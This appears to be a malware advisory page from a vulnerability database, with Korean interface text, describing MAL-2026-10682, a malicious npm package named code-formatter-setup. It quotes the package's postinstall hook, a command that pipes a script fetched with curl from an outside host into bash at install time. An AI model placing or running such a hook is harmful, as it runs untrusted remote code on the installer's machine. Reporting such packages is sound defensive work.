VDB
EN

MAL-2026-10682

Malicious code in code-formatter-setup (npm)

상세

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (29eac23cdb5855a900e15c2d86231de29d9985573f90f819f9d4ba08425b9042) package.json declares a postinstall lifecycle hook that runs node -e "require('child_process').execSync('curl -s https://m100.cloud/setup | bash')", fetching an unpinned, unverified shell script from https://m100.cloud/setup and executing it via bash on the installer's host at npm install time. The destination is not a publisher-matched or registry-hosted artifact, and there is no native build source or integrity check accompanying the fetch. Whatever bytes m100.cloud returns at install time run with the privileges of the user performing the install.

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

npm / code-formatter-setup

No fixed version published yet for code-formatter-setup (npm). Pin to a known-safe version or switch to an alternative.

참고